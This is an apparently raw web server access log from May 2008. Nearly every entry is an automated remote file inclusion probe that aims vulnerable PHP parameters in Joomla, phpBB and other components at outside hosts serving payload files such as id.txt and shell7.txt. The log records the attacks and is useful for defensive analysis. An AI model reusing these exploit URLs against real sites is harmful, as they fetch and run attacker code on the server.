69.89.22.139 - - [25/May/2008:09:00:00 -0700] "GET /logs/send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:00:00 -0700] "GET /send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:00:22 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:00:23 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:00:23 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:00:27 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:00:27 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:00:28 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.51.76.234 - - [25/May/2008:09:00:33 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.51.76.234 - - [25/May/2008:09:00:38 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.51.76.234 - - [25/May/2008:09:00:41 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.106.68 - - [25/May/2008:09:01:06 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [25/May/2008:09:01:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [25/May/2008:09:01:06 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:01:24 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.113.228.232 - - [25/May/2008:09:01:30 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [25/May/2008:09:01:30 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [25/May/2008:09:01:30 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:01:37 -0700] "GET /logs/index.php?nic=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:01:39 -0700] "GET /index.php?nic=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.168.36.247 - - [25/May/2008:09:01:47 -0700] "GET /logs/access_080229.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:02:20 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:02:23 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:02:57 -0700] "GET /logs/access_080125.log/send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:02:58 -0700] "GET /send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:02:58 -0700] "GET /logs/send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:03:09 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:03:09 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:03:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:03:23 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:03:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:03:23 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:03:35 -0700] "GET /logs/send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:03:36 -0700] "GET /send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:03:45 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.59.130 - - [25/May/2008:09:03:50 -0700] "GET /logs/access_080129.log//becommunity/community/index.php?from_market=Y&pageurl=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [25/May/2008:09:03:50 -0700] "GET /logs/access_080129.log//becommunity/community/index.php?from_market=Y&pageurl=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [25/May/2008:09:03:51 -0700] "GET //becommunity/community/index.php?from_market=Y&pageurl=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [25/May/2008:09:03:51 -0700] "GET //becommunity/community/index.php?from_market=Y&pageurl=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [25/May/2008:09:03:51 -0700] "GET /logs//becommunity/community/index.php?from_market=Y&pageurl=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.59.130 - - [25/May/2008:09:03:51 -0700] "GET /logs//becommunity/community/index.php?from_market=Y&pageurl=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:04:12 -0700] "GET /logs/access_080215.log//errors.php?error=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:04:12 -0700] "GET //errors.php?error=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:04:12 -0700] "GET /logs//errors.php?error=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:04:12 -0700] "GET /logs/access.log//errors.php?error=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:04:12 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nfsmexico.com/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:04:13 -0700] "GET //component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nfsmexico.com/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:04:13 -0700] "GET /logs//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nfsmexico.com/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:04:22 -0700] "GET /logs/access_080121.log/send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.172.144.57 - - [25/May/2008:09:04:34 -0700] "GET /administrator/index.php?mosConfig_absolute_path=http://www.crazywap.co.uk/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
83.172.144.57 - - [25/May/2008:09:04:34 -0700] "GET /logs/administrator/index.php?mosConfig_absolute_path=http://www.crazywap.co.uk/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:05:20 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.93.62.112 - - [25/May/2008:09:05:40 -0700] "GET /logs/access_080330.log//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/jembutz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.112 - - [25/May/2008:09:05:40 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/jembutz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.112 - - [25/May/2008:09:05:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/jembutz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.112 - - [25/May/2008:09:05:47 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/jembutz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.112 - - [25/May/2008:09:05:47 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/jembutz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.112 - - [25/May/2008:09:05:48 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://h1.ripway.com/jembutz/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.213.115 - - [25/May/2008:09:05:55 -0700] "GET /logs//include.php?path[docroot]=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [25/May/2008:09:05:55 -0700] "GET //include.php?path[docroot]=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:06:04 -0700] "GET /logs/errors.php?error=http://www.nfsmexico.com/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:06:05 -0700] "GET /errors.php?error=http://www.nfsmexico.com/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:06:15 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:06:16 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:06:16 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.69.204.75 - - [25/May/2008:09:06:17 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.dmulk.com"
218.94.38.182 - - [25/May/2008:09:06:19 -0700] "GET /modules/My_eGallery/index.php?basepath=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
218.94.38.182 - - [25/May/2008:09:06:20 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.227.251.172 - - [25/May/2008:09:06:30 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:06:42 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.208.13.87 - - [25/May/2008:09:06:58 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [25/May/2008:09:06:58 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [25/May/2008:09:06:58 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:07:01 -0700] "GET /logs/access_080121.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:07:04 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,36//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nfsmexico.com/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:07:04 -0700] "GET //component/option,com_sitemap/Itemid,36//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nfsmexico.com/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:07:04 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:07:05 -0700] "GET /logs//component/option,com_sitemap/Itemid,36//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nfsmexico.com/cmdAsc[1].txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:07:06 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:07:33 -0700] "GET /logs/access_080218.log/index.php?sourcedir=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:07:34 -0700] "GET /logs/access_080131.log//squirrelcart/cart_content.php?cart_isp_root=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:07:34 -0700] "GET /logs/access_080131.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:07:34 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:07:34 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:07:34 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:07:34 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:08:13 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:08:13 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:08:13 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:08:30 -0700] "GET /logs/access_080215.log//squirrelcart/cart_content.php?cart_isp_root=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:08:30 -0700] "GET /logs/access_080215.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:08:31 -0700] "GET /logs/[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:08:36 -0700] "GET /logs/access_080110.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.160.203.190 - - [25/May/2008:09:08:36 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [25/May/2008:09:08:37 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [25/May/2008:09:08:37 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [25/May/2008:09:08:41 -0700] "GET /logs//errors.php?error=http://www.hotlinkfiles.com/files/1246846_4kcwb/shell7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [25/May/2008:09:08:41 -0700] "GET //errors.php?error=http://www.hotlinkfiles.com/files/1246846_4kcwb/shell7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:09:01 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:09:09 -0700] "GET /logs/send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:09:09 -0700] "GET /send_reminders.php?includedir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:09:18 -0700] "GET /[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.19.169 - - [25/May/2008:09:09:20 -0700] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:09:32 -0700] "GET /logs/[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:09:32 -0700] "GET /[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.58.181.74 - - [25/May/2008:09:10:10 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.208.111.178 - - [25/May/2008:09:10:11 -0700] "GET /logs/access_080327.log/admin/classes/TplLoad.php?full_path_to_public_program=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.181.74 - - [25/May/2008:09:10:12 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [25/May/2008:09:10:12 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:10:19 -0700] "GET /logs//errors.php?error=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:10:19 -0700] "GET //errors.php?error=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.110.249.70 - - [25/May/2008:09:10:30 -0700] "GET /logs/access_080220.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.110.249.70 - - [25/May/2008:09:10:31 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.110.249.70 - - [25/May/2008:09:10:31 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.37.115 - - [25/May/2008:09:10:38 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
